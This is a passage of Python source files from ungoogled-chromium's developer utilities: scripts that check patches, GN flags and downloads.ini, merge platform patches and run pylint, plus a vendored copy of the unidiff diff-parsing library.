action='store_false', dest='error_unused', help='Do not treat unused patterns/prefixes as an error.') args = parser.parse_args(args_list) if args.domain_exclude_prefix is not None: DOMAIN_EXCLUDE_PREFIXES.extend(args.domain_exclude_prefix) if args.tree.exists() and not _dir_empty(args.tree): get_logger().info('Using existing source tree at %s', args.tree) else: get_logger().error('No source tree found. Aborting.') sys.exit(1) get_logger().info('Computing lists...') pruning_set, domain_substitution_set, unused_patterns = compute_lists( args.tree, DomainRegexList(args.domain_regex).search_regex, args.processes) with args.pruning.open('w', encoding=_ENCODING) as file_obj: file_obj.writelines('%s\n' % line for line in pruning_set) with args.domain_substitution.open('w', encoding=_ENCODING) as file_obj: file_obj.writelines('%s\n' % line for line in domain_substitution_set) if unused_patterns.log_unused(args.error_unused) and args.error_unused: get_logger().error('Please update or remove unused patterns and/or prefixes. ' 'The lists have still been updated with the remaining valid entries.') sys.exit(1) if __name__ == "__main__": main() File: devutils/check_gn_flags.py #!/usr/bin/env python3 # -*- coding: UTF-8 -*- # Copyright (c) 2019 The ungoogled-chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Run sanity checking algorithms over GN flags It checks the following: * GN flags in flags.gn are sorted and not duplicated Exit codes: * 0 if no problems detected * 1 if warnings or errors occur """ import argparse import sys from pathlib import Path sys.path.insert(0, str(Path(__file__).resolve().parent.parent / 'utils')) from _common import ENCODING, get_logger sys.path.pop(0) def check_gn_flags(gn_flags_path): """ Checks if GN flags are sorted and not duplicated. gn_flags_path is a pathlib.Path to the GN flags file to check Returns True if warnings were logged; False otherwise """ keys_seen = set() warnings = False with gn_flags_path.open(encoding=ENCODING) as file_obj: iterator = iter(file_obj.read().splitlines()) try: previous = next(iterator) except StopIteration: return warnings for current in iterator: gn_key = current.split('=')[0] if gn_key in keys_seen: get_logger().warning('In GN flags %s, "%s" appears at least twice', gn_flags_path, gn_key) warnings = True else: keys_seen.add(gn_key) if current < previous: get_logger().warning('In GN flags %s, "%s" should be sorted before "%s"', gn_flags_path, current, previous) warnings = True previous = current return warnings def main(): """CLI entrypoint""" root_dir = Path(__file__).resolve().parent.parent default_flags_gn = root_dir / 'flags.gn' parser = argparse.ArgumentParser(description=__doc__) parser.add_argument('-f', '--flags-gn', type=Path, default=default_flags_gn, help='Path to the GN flags to use. Default: %(default)s') args = parser.parse_args() if check_gn_flags(args.flags_gn): sys.exit(1) sys.exit(0) if __name__ == '__main__': main() File: devutils/check_files_exist.py #!/usr/bin/env python3 # Copyright (c) 2019 The ungoogled-chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """ Checks if files in a list exist. Used for quick validation of lists in CI checks. """ import argparse import sys from pathlib import Path def main(): """CLI entrypoint""" parser = argparse.ArgumentParser(description=__doc__) parser.add_argument('root_dir', type=Path, help='The directory to check from') parser.add_argument('input_files', type=Path, nargs='+', help='The files lists to check') args = parser.parse_args() for input_name in args.input_files: file_iter = filter( len, map(str.strip, Path(input_name).read_text(encoding='UTF-8').splitlines())) for file_name in file_iter: if not Path(args.root_dir, file_name).exists(): print('ERROR: Path "{}" from file "{}" does not exist.'.format( file_name, input_name), file=sys.stderr) sys.exit(1) if __name__ == "__main__": main() File: devutils/__init__.py File: devutils/check_downloads_ini.py #!/usr/bin/env python3 # -*- coding: UTF-8 -*- # Copyright (c) 2019 The ungoogled-chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Run sanity checking algorithms over downloads.ini files It checks the following: * downloads.ini has the correct format (i.e. conforms to its schema) Exit codes: * 0 if no problems detected * 1 if warnings or errors occur """ import argparse import sys from pathlib import Path sys.path.insert(0, str(Path(__file__).resolve().parent.parent / 'utils')) from downloads import DownloadInfo, schema sys.path.pop(0) def check_downloads_ini(downloads_ini_iter): """ Combines and checks if the the downloads.ini files provided are valid. downloads_ini_iter must be an iterable of strings to downloads.ini files. Returns True if errors occured, False otherwise. """ try: DownloadInfo(downloads_ini_iter) except schema.SchemaError: return True return False def main(): """CLI entrypoint""" root_dir = Path(__file__).resolve().parent.parent default_downloads_ini = [str(root_dir / 'downloads.ini')] parser = argparse.ArgumentParser(description=__doc__) parser.add_argument('-d', '--downloads-ini', type=Path, nargs='*', default=default_downloads_ini, help='List of downloads.ini files to check. Default: %(default)s') args = parser.parse_args() if check_downloads_ini(args.downloads_ini): sys.exit(1) sys.exit(0) if __name__ == '__main__': main() File: devutils/check_patch_files.py #!/usr/bin/env python3 # -*- coding: UTF-8 -*- # Copyright (c) 2019 The ungoogled-chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Run sanity checking algorithms over ungoogled-chromium's patch files It checks the following: * All patches exist * All patches are referenced by the patch order Exit codes: * 0 if no problems detected * 1 if warnings or errors occur """ import argparse import sys from pathlib import Path from third_party import unidiff sys.path.insert(0, str(Path(__file__).resolve().parent.parent / 'utils')) from _common import ENCODING, get_logger, parse_series # pylint: disable=wrong-import-order sys.path.pop(0) # File suffixes to ignore for checking unused patches _PATCHES_IGNORE_SUFFIXES = {'.md'} def _read_series_file(patches_dir, series_file, join_dir=False): """ Returns a generator over the entries in the series file patches_dir is a pathlib.Path to the directory of patches series_file is a pathlib.Path relative to patches_dir join_dir indicates if the patches_dir should be joined with the series entries """ for entry in parse_series(patches_dir / series_file): if join_dir: yield patches_dir / entry else: yield entry def check_patch_readability(patches_dir, series_path=Path('series')): """ Check if the patches from iterable patch_path_iter are readable. Patches that are not are logged to stdout. Returns True if warnings occured, False otherwise. """ warnings = False for patch_path in _read_series_file(patches_dir, series_path, join_dir=True): if patch_path.exists(): with patch_path.open(encoding=ENCODING) as file_obj: try: unidiff.PatchSet(file_obj.read()) except unidiff.errors.UnidiffParseError: get_logger().exception('Could not parse patch: %s', patch_path) warnings = True continue else: get_logger().warning('Patch not found: %s', patch_path) warnings = True return warnings def check_unused_patches(patches_dir, series_path=Path('series')): """ Checks if there are unused patches in patch_dir from series file series_path. Unused patches are logged to stdout. patches_dir is a pathlib.Path to the directory of patches series_path is a pathlib.Path to the series file relative to the patches_dir Returns True if there are unused patches; False otherwise. """ unused_patches = set() for path in patches_dir.rglob('*'): if path.is_dir(): continue if path.suffix in _PATCHES_IGNORE_SUFFIXES: continue unused_patches.add(str(path.relative_to(patches_dir))) unused_patches -= set(_read_series_file(patches_dir, series_path)) unused_patches.remove(str(series_path)) logger = get_logger() for entry in sorted(unused_patches): logger.warning('Unused patch: %s', entry) return bool(unused_patches) def check_series_duplicates(patches_dir, series_path=Path('series')): """ Checks if there are duplicate entries in the series file series_path is a pathlib.Path to the series file relative to the patches_dir returns True if there are duplicate entries; False otherwise. """ entries_seen = set() for entry in _read_series_file(patches_dir, series_path): if entry in entries_seen: get_logger().warning('Patch appears more than once in series: %s', entry) return True entries_seen.add(entry) return False def main(): """CLI entrypoint""" root_dir = Path(__file__).resolve().parent.parent default_patches_dir = root_dir / 'patches' parser = argparse.ArgumentParser(description=__doc__) parser.add_argument('-p', '--patches', type=Path, default=default_patches_dir, help='Path to the patches directory to use. Default: %(default)s') args = parser.parse_args() warnings = False warnings |= check_patch_readability(args.patches) warnings |= check_series_duplicates(args.patches) warnings |= check_unused_patches(args.patches) if warnings: sys.exit(1) sys.exit(0) if __name__ == '__main__': main() File: devutils/update_platform_patches.py #!/usr/bin/env python3 # -*- coding: utf-8 -*- # Copyright (c) 2019 The ungoogled-chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """ Utility to ease the updating of platform patches against ungoogled-chromium's patches """ import argparse import os import shutil import sys from pathlib import Path sys.path.insert(0, str(Path(__file__).resolve().parent.parent / 'utils')) from _common import ENCODING, get_logger from patches import merge_patches sys.path.pop(0) _SERIES = 'series' _SERIES_ORIG = 'series.orig' _SERIES_PREPEND = 'series.prepend' _SERIES_MERGED = 'series.merged' def merge_platform_patches(platform_patches_dir, prepend_patches_dir): ''' Prepends prepend_patches_dir into platform_patches_dir Returns True if successful, False otherwise ''' if not (platform_patches_dir / _SERIES).exists(): get_logger().error('Unable to find platform series file: %s', platform_patches_dir / _SERIES) return False # Make series.orig file shutil.copyfile(str(platform_patches_dir / _SERIES), str(platform_patches_dir / _SERIES_ORIG)) # Make series.prepend shutil.copyfile(str(prepend_patches_dir / _SERIES), str(platform_patches_dir / _SERIES_PREPEND)) # Merge patches merge_patches([prepend_patches_dir], platform_patches_dir, prepend=True) (platform_patches_dir / _SERIES).replace(platform_patches_dir / _SERIES_MERGED) return True def _dir_empty(path): ''' Returns True if the directory exists and is empty; False otherwise ''' try: next(os.scandir(str(path))) except StopIteration: return True except FileNotFoundError: pass return False def _remove_files_with_dirs(root_dir, sorted_file_iter): ''' Deletes a list of sorted files relative to root_dir, removing empty directories along the way ''' past_parent = None for partial_path in sorted_file_iter: complete_path = Path(root_dir, partial_path) try: complete_path.unlink() except FileNotFoundError: get_logger().warning('Could not remove prepended patch: %s', complete_path) if past_parent != complete_path.parent: while past_parent and _dir_empty(past_parent): past_parent.rmdir() past_parent = past_parent.parent past_parent = complete_path.parent # Handle last path's directory while _dir_empty(complete_path.parent): complete_path.parent.rmdir() complete_path = complete_path.parent def unmerge_platform_patches(platform_patches_dir): ''' Undo merge_platform_patches(), adding any new patches from series.merged as necessary Returns True if successful, False otherwise ''' if not (platform_patches_dir / _SERIES_PREPEND).exists(): get_logger().error('Unable to find series.prepend at: %s', platform_patches_dir / _SERIES_PREPEND) return False prepend_series = set( filter(len, (platform_patches_dir / _SERIES_PREPEND).read_text(encoding=ENCODING).splitlines())) # Remove prepended files with directories _remove_files_with_dirs(platform_patches_dir, sorted(prepend_series)) # Determine positions of blank spaces in series.orig if not (platform_patches_dir / _SERIES_ORIG).exists(): get_logger().error('Unable to find series.orig at: %s', platform_patches_dir / _SERIES_ORIG) return False orig_series = (platform_patches_dir / _SERIES_ORIG).read_text(encoding=ENCODING).splitlines() # patch path -> list of lines after patch path and before next patch path path_comments = dict() # patch path -> inline comment for patch path_inline_comments = dict() previous_path = None for partial_path in orig_series: if not partial_path or partial_path.startswith('#'): if partial_path not in path_comments: path_comments[previous_path] = list() path_comments[previous_path].append(partial_path) else: path_parts = partial_path.split(' #', maxsplit=1) previous_path = path_parts[0] if len(path_parts) == 2: path_inline_comments[path_parts[0]] = path_parts[1] # Apply changes on series.merged into a modified version of series.orig if not (platform_patches_dir / _SERIES_MERGED).exists(): get_logger().error('Unable to find series.merged at: %s', platform_patches_dir / _SERIES_MERGED) return False new_series = filter(len, (platform_patches_dir / _SERIES_MERGED).read_text(encoding=ENCODING).splitlines()) new_series = filter((lambda x: x not in prepend_series), new_series) new_series = list(new_series) series_index = 0 while series_index < len(new_series): current_path = new_series[series_index] if current_path in path_inline_comments: new_series[series_index] = current_path + ' #' + path_inline_comments[current_path] if current_path in path_comments: new_series.insert(series_index + 1, '\n'.join(path_comments[current_path])) series_index += 1 series_index += 1 # Write series file with (platform_patches_dir / _SERIES).open('w', encoding=ENCODING) as series_file: series_file.write('\n'.join(new_series)) series_file.write('\n') # All other operations are successful; remove merging intermediates (platform_patches_dir / _SERIES_MERGED).unlink() (platform_patches_dir / _SERIES_ORIG).unlink() (platform_patches_dir / _SERIES_PREPEND).unlink() return True def main(): """CLI Entrypoint""" parser = argparse.ArgumentParser(description=__doc__) parser.add_argument('command', choices=('merge', 'unmerge'), help='Merge or unmerge ungoogled-chromium patches with platform patches') parser.add_argument('platform_patches', type=Path, help='The path to the platform patches in GNU Quilt format to merge into') args = parser.parse_args() repo_dir = Path(__file__).resolve().parent.parent success = False if args.command == 'merge': success = merge_platform_patches(args.platform_patches, repo_dir / 'patches') elif args.command == 'unmerge': success = unmerge_platform_patches(args.platform_patches) else: raise NotImplementedError(args.command) if success: return 0 return 1 if __name__ == '__main__': sys.exit(main()) File: devutils/run_devutils_pylint.py #!/usr/bin/env python3 # Copyright (c) 2019 The ungoogled-chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Run Pylint over devutils""" import argparse import sys from pathlib import Path from run_other_pylint import ChangeDir, run_pylint def main(): """CLI entrypoint""" parser = argparse.ArgumentParser(description='Run Pylint over devutils') parser.add_argument('--hide-fixme', action='store_true', help='Hide "fixme" Pylint warnings.') parser.add_argument('--show-locally-disabled', action='store_true', help='Show "locally-disabled" Pylint warnings.') args = parser.parse_args() disables = [ 'wrong-import-position', 'bad-continuation', 'duplicate-code', ] if args.hide_fixme: disables.append('fixme') if not args.show_locally_disabled: disables.append('locally-disabled') pylint_options = [ '--disable={}'.format(','.join(disables)), '--jobs=4', '--score=n', '--persistent=n', ] ignore_prefixes = [ ('third_party', ), ] sys.path.insert(1, str(Path(__file__).resolve().parent.parent / 'utils')) sys.path.insert(2, str(Path(__file__).resolve().parent.parent / 'devutils' / 'third_party')) with ChangeDir(Path(__file__).parent): result = run_pylint( Path(), pylint_options, ignore_prefixes=ignore_prefixes, ) sys.path.pop(2) sys.path.pop(1) if not result: sys.exit(1) sys.exit(0) if __name__ == '__main__': main() File: devutils/validate_config.py #!/usr/bin/env python3 # -*- coding: UTF-8 -*- # Copyright (c) 2019 The ungoogled-chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Run sanity checking algorithms over ungoogled-chromium's config files NOTE: This script is hardcoded to run over ungoogled-chromium's config files only. To check other files, use the other scripts imported by this script. It checks the following: * All patches exist * All patches are referenced by the patch order * Each patch is used only once * GN flags in flags.gn are sorted and not duplicated * downloads.ini has the correct format (i.e. conforms to its schema) Exit codes: * 0 if no problems detected * 1 if warnings or errors occur """ import sys from pathlib import Path from check_downloads_ini import check_downloads_ini from check_gn_flags import check_gn_flags from check_patch_files import (check_patch_readability, check_series_duplicates, check_unused_patches) def main(): """CLI entrypoint""" warnings = False root_dir = Path(__file__).resolve().parent.parent patches_dir = root_dir / 'patches' # Check patches warnings |= check_patch_readability(patches_dir) warnings |= check_series_duplicates(patches_dir) warnings |= check_unused_patches(patches_dir) # Check GN flags warnings |= check_gn_flags(root_dir / 'flags.gn') # Check downloads.ini warnings |= check_downloads_ini([root_dir / 'downloads.ini']) if warnings: sys.exit(1) sys.exit(0) if __name__ == '__main__': if sys.argv[1:]: print(__doc__) else: main() File: devutils/run_utils_pylint.py #!/usr/bin/env python3 # Copyright (c) 2019 The ungoogled-chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Run Pylint over utils""" import argparse import sys from pathlib import Path from run_other_pylint import ChangeDir, run_pylint def main(): """CLI entrypoint""" parser = argparse.ArgumentParser(description='Run Pylint over utils') parser.add_argument('--hide-fixme', action='store_true', help='Hide "fixme" Pylint warnings.') parser.add_argument('--show-locally-disabled', action='store_true', help='Show "locally-disabled" Pylint warnings.') args = parser.parse_args() disable = ['bad-continuation'] if args.hide_fixme: disable.append('fixme') if not args.show_locally_disabled: disable.append('locally-disabled') pylint_options = [ '--disable={}'.format(','.join(disable)), '--jobs=4', '--max-args=6', '--score=n', '--persistent=n', ] ignore_prefixes = [ ('third_party', ), ('tests', ), ] sys.path.insert(1, str(Path(__file__).resolve().parent.parent / 'utils' / 'third_party')) sys.path.append(Path(__file__).resolve().parent.parent / 'utils') with ChangeDir(Path(__file__).resolve().parent.parent / 'utils'): result = run_pylint( Path(), pylint_options, ignore_prefixes=ignore_prefixes, ) sys.path.pop(1) if not result: sys.exit(1) sys.exit(0) if __name__ == '__main__': main() File: devutils/third_party/__init__.py File: devutils/third_party/unidiff/patch.py # -*- coding: utf-8 -*- # The MIT License (MIT) # Copyright (c) 2014-2017 Matias Bordese # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. # IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, # DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR # OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE # OR OTHER DEALINGS IN THE SOFTWARE. """Classes used by the unified diff parser to keep the diff data.""" from __future__ import unicode_literals import codecs import sys from .constants import ( DEFAULT_ENCODING, LINE_TYPE_ADDED, LINE_TYPE_CONTEXT, LINE_TYPE_EMPTY, LINE_TYPE_REMOVED, LINE_TYPE_NO_NEWLINE, LINE_VALUE_NO_NEWLINE, RE_HUNK_BODY_LINE, RE_HUNK_EMPTY_BODY_LINE, RE_HUNK_HEADER, RE_SOURCE_FILENAME, RE_TARGET_FILENAME, RE_NO_NEWLINE_MARKER, ) from .errors import UnidiffParseError PY2 = sys.version_info[0] == 2 if PY2: from StringIO import StringIO open_file = codecs.open make_str = lambda x: x.encode(DEFAULT_ENCODING) def implements_to_string(cls): cls.__unicode__ = cls.__str__ cls.__str__ = lambda x: x.__unicode__().encode(DEFAULT_ENCODING) return cls else: from io import StringIO open_file = open make_str = str implements_to_string = lambda x: x unicode = str basestring = str @implements_to_string class Line(object): """A diff line.""" def __init__(self, value, line_type, source_line_no=None, target_line_no=None, diff_line_no=None): super(Line, self).__init__() self.source_line_no = source_line_no self.target_line_no = target_line_no self.diff_line_no = diff_line_no self.line_type = line_type self.value = value def __repr__(self): return make_str("<Line: %s%s>") % (self.line_type, self.value) def __str__(self): return "%s%s" % (self.line_type, self.value) def __eq__(self, other): return (self.source_line_no == other.source_line_no and self.target_line_no == other.target_line_no and self.diff_line_no == other.diff_line_no and self.line_type == other.line_type and self.value == other.value) @property def is_added(self): return self.line_type == LINE_TYPE_ADDED @property def is_removed(self): return self.line_type == LINE_TYPE_REMOVED @property def is_context(self): return self.line_type == LINE_TYPE_CONTEXT @implements_to_string class PatchInfo(list): """Lines with extended patch info. Format of this info is not documented and it very much depends on patch producer. """ def __repr__(self): value = "<PatchInfo: %s>" % self[0].strip() return make_str(value) def __str__(self): return ''.join(unicode(line) for line in self) @implements_to_string class Hunk(list): """Each of the modified blocks of a file.""" def __init__(self, src_start=0, src_len=0, tgt_start=0, tgt_len=0, section_header=''): if src_len is None: src_len = 1 if tgt_len is None: tgt_len = 1 self.added = 0 # number of added lines self.removed = 0 # number of removed lines self.source = [] self.source_start = int(src_start) self.source_length = int(src_len) self.target = [] self.target_start = int(tgt_start) self.target_length = int(tgt_len) self.section_header = section_header def __repr__(self): value = "<Hunk: @@ %d,%d %d,%d @@ %s>" % (self.source_start, self.source_length, self.target_start, self.target_length, self.section_header) return make_str(value) def __str__(self): # section header is optional and thus we output it only if it's present head = "@@ -%d,%d +%d,%d @@%s\n" % ( self.source_start, self.source_length, self.target_start, self.target_length, ' ' + self.section_header if self.section_header else '') content = ''.join(unicode(line) for line in self) return head + content def append(self, line): """Append the line to hunk, and keep track of source/target lines.""" super(Hunk, self).append(line) s = str(line) if line.is_added: self.added += 1 self.target.append(s) elif line.is_removed: self.removed += 1 self.source.append(s) elif line.is_context: self.target.append(s) self.source.append(s) def is_valid(self): """Check hunk header data matches entered lines info.""" return (len(self.source) == self.source_length and len(self.target) == self.target_length) def source_lines(self): """Hunk lines from source file (generator).""" return (l for l in self if l.is_context or l.is_removed) def target_lines(self): """Hunk lines from target file (generator).""" return (l for l in self if l.is_context or l.is_added) class PatchedFile(list): """Patch updated file, it is a list of Hunks.""" def __init__(self, patch_info=None, source='', target='', source_timestamp=None, target_timestamp=None): super(PatchedFile, self).__init__() self.patch_info = patch_info self.source_file = source self.source_timestamp = source_timestamp self.target_file = target self.target_timestamp = target_timestamp def __repr__(self): return make_str("<PatchedFile: %s>") % make_str(self.path) def __str__(self): # patch info is optional info = '' if self.patch_info is None else str(self.patch_info) source = "--- %s%s\n" % ( self.source_file, '\t' + self.source_timestamp if self.source_timestamp else '') target = "+++ %s%s\n" % ( self.target_file, '\t' + self.target_timestamp if self.target_timestamp else '') hunks = ''.join(unicode(hunk) for hunk in self) return info + source + target + hunks def _parse_hunk(self, header, diff, encoding): """Parse hunk details.""" header_info = RE_HUNK_HEADER.match(header) hunk_info = header_info.groups() hunk = Hunk(*hunk_info) source_line_no = hunk.source_start target_line_no = hunk.target_start expected_source_end = source_line_no + hunk.source_length expected_target_end = target_line_no + hunk.target_length for diff_line_no, line in diff: if encoding is not None: line = line.decode(encoding) valid_line = RE_HUNK_EMPTY_BODY_LINE.match(line) if not valid_line: valid_line = RE_HUNK_BODY_LINE.match(line) if not valid_line: raise UnidiffParseError('Hunk diff line expected: %s' % line) line_type = valid_line.group('line_type') if line_type == LINE_TYPE_EMPTY: line_type = LINE_TYPE_CONTEXT value = valid_line.group('value') original_line = Line(value, line_type=line_type) if line_type == LINE_TYPE_ADDED: original_line.target_line_no = target_line_no target_line_no += 1 elif line_type == LINE_TYPE_REMOVED: original_line.source_line_no = source_line_no source_line_no += 1 elif line_type == LINE_TYPE_CONTEXT: original_line.target_line_no = target_line_no target_line_no += 1 original_line.source_line_no = source_line_no source_line_no += 1 elif line_type == LINE_TYPE_NO_NEWLINE: pass else: original_line = None # stop parsing if we got past expected number of lines if (source_line_no > expected_source_end or target_line_no > expected_target_end): raise UnidiffParseError('Hunk is longer than expected') if original_line: original_line.diff_line_no = diff_line_no hunk.append(original_line) # if hunk source/target lengths are ok, hunk is complete if (source_line_no == expected_source_end and target_line_no == expected_target_end): break # report an error if we haven't got expected number of lines if (source_line_no < expected_source_end or target_line_no < expected_target_end): raise UnidiffParseError('Hunk is shorter than expected') self.append(hunk) def _add_no_newline_marker_to_last_hunk(self): if not self: raise UnidiffParseError( 'Unexpected marker:' + LINE_VALUE_NO_NEWLINE) last_hunk = self[-1] last_hunk.append( Line(LINE_VALUE_NO_NEWLINE + '\n', line_type=LINE_TYPE_NO_NEWLINE)) def _append_trailing_empty_line(self): if not self: raise UnidiffParseError('Unexpected trailing newline character') last_hunk = self[-1] last_hunk.append(Line('\n', line_type=LINE_TYPE_EMPTY)) @property def path(self): """Return the file path abstracted from VCS.""" if (self.source_file.startswith('a/') and self.target_file.startswith('b/')): filepath = self.source_file[2:] elif (self.source_file.startswith('a/') and self.target_file == '/dev/null'): filepath = self.source_file[2:] elif (self.target_file.startswith('b/') and self.source_file == '/dev/null'): filepath = self.target_file[2:] else: filepath = self.source_file return filepath @property def added(self): """Return the file total added lines.""" return sum([hunk.added for hunk in self]) @property def removed(self): """Return the file total removed lines.""" return sum([hunk.removed for hunk in self]) @property def is_added_file(self): """Return True if this patch adds the file.""" return (len(self) == 1 and self[0].source_start == 0 and self[0].source_length == 0) @property def is_removed_file(self): """Return True if this patch removes the file.""" return (len(self) == 1 and self[0].target_start == 0 and self[0].target_length == 0) @property def is_modified_file(self): """Return True if this patch modifies the file.""" return not (self.is_added_file or self.is_removed_file) @implements_to_string class PatchSet(list): """A list of PatchedFiles.""" def __init__(self, f, encoding=None): super(PatchSet, self).__init__() # convert string inputs to StringIO objects if isinstance(f, basestring): f = self._convert_string(f, encoding) # make sure we pass an iterator object to parse data = iter(f) # if encoding is None, assume we are reading unicode data self._parse(data, encoding=encoding) def __repr__(self): return make_str('<PatchSet: %s>') % super(PatchSet, self).__repr__() def __str__(self): return ''.join(unicode(patched_file) for patched_file in self) def _parse(self, diff, encoding): current_file = None patch_info = None diff = enumerate(diff, 1) for unused_diff_line_no, line in diff: if encoding is not None: line = line.decode(encoding) # check for source file header is_source_filename = RE_SOURCE_FILENAME.match(line) if is_source_filename: source_file = is_source_filename.group('filename') source_timestamp = is_source_filename.group('timestamp') # reset current file current_file = None continue # check for target file header is_target_filename = RE_TARGET_FILENAME.match(line) if is_target_filename: if current_file is not None: raise UnidiffParseError('Target without source: %s' % line) target_file = is_target_filename.group('filename') target_timestamp = is_target_filename.group('timestamp') # add current file to PatchSet current_file = PatchedFile( patch_info, source_file, target_file, source_timestamp, target_timestamp) self.append(current_file) patch_info = None continue # check for hunk header is_hunk_header = RE_HUNK_HEADER.match(line) if is_hunk_header: if current_file is None: raise UnidiffParseError('Unexpected hunk found: %s' % line) current_file._parse_hunk(line, diff, encoding) continue # check for no newline marker is_no_newline = RE_NO_NEWLINE_MARKER.match(line) if is_no_newline: if current_file is None: raise UnidiffParseError('Unexpected marker: %s' % line) current_file._add_no_newline_marker_to_last_hunk() continue # sometimes hunks can be followed by empty lines if line == '\n' and current_file is not None: current_file._append_trailing_empty_line() continue # if nothing has matched above then this line is a patch info if patch_info is None: current_file = None patch_info = PatchInfo() patch_info.append(line) @classmethod def from_filename(cls, filename, encoding=DEFAULT_ENCODING, errors=None): """Return a PatchSet instance given a diff filename.""" with open_file(filename, 'r', encoding=encoding, errors=errors) as f: instance = cls(f) return instance @staticmethod def _convert_string(data, encoding=None, errors='strict'): if encoding is not None: # if encoding is given, assume bytes and decode data = unicode(data, encoding=encoding, errors=errors) return StringIO(data) @classmethod def from_string(cls, data, encoding=None, errors='strict'): """Return a PatchSet instance given a diff string.""" return cls(cls._convert_string(data, encoding, errors)) @property def added_files(self): """Return patch added files as a list.""" return [f for f in self if f.is_added_file] @property def removed_files(self): """Return patch removed files as a list.""" return [f for f in self if f.is_removed_file] @property def modified_files(self): """Return patch modified files as a list.""" return [f for f in self if f.is_modified_file] @property def added(self): """Return the patch total added lines.""" return sum([f.added for f in self]) @property def removed(self): """Return the patch total removed lines.""" return sum([f.removed for f in self]) File: devutils/third_party/unidiff/constants.py # -*- coding: utf-8 -*- # The MIT License (MIT) # Copyright (c) 2014-2017 Matias Bordese # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. # IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, # DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR # OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE # OR OTHER DEALINGS IN THE SOFTWARE. """Useful constants and regexes used by the package.""" from __future__ import unicode_literals import re RE_SOURCE_FILENAME = re.compile( r'^--- (?P<filename>[^\t\n]+)(?:\t(?P<timestamp>[^\n]+))?') RE_TARGET_FILENAME = re.compile( r'^\+\+\+ (?P<filename>[^\t\n]+)(?:\t(?P<timestamp>[^\n]+))?') # @@ (source offset, length) (target offset, length) @@ (section header) RE_HUNK_HEADER = re.compile( r"^@@ -(\d+)(?:,(\d+))? \+(\d+)(?:,(\d+))?\ @@[ ]?(.*)") # kept line (context) # \n empty line (treat like context) # + added line # - deleted line # \ No newline case RE_HUNK_BODY_LINE = re.compile( r'^(?P<line_type>[- \+\\])(?P<value>.*)', re.DOTALL) RE_HUNK_EMPTY_BODY_LINE = re.compile( r'^(?P<line_type>[- \+\\]?)(?P<value>[\r\n]{1,2})', re.DOTALL) RE_NO_NEWLINE_MARKER = re.compile(r'^\\ No newline at end of file') DEFAULT_ENCODING = 'UTF-8' LINE_TYPE_ADDED = '+' LINE_TYPE_REMOVED = '-' LINE_TYPE_CONTEXT = ' ' LINE_TYPE_EMPTY = '' LINE_TYPE_NO_NEWLINE = '\\' LINE_VALUE_NO_NEWLINE = ' No newline at end of file' File: devutils/third_party/unidiff/__init__.py # -*- coding: utf-8 -*- # The MIT License (MIT) # Copyright (c) 2014-2017 Matias Bordese # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. # IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, # DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR # OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE # OR OTHER DEALINGS IN THE SOFTWARE. """Unidiff parsing library.""" from __future__ import unicode_literals from . import __version__ from .patch import ( DEFAULT_ENCODING, LINE_TYPE_ADDED, LINE_TYPE_CONTEXT, LINE_TYPE_REMOVED, Hunk, PatchedFile, PatchSet, UnidiffParseError, ) VERSION = __version__.__version__ File: devutils/third_party/unidiff/__version__.py # -*- coding: utf-8 -*- # The MIT License (MIT) # Copyright (c) 2014-2017 Matias Bordese # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, 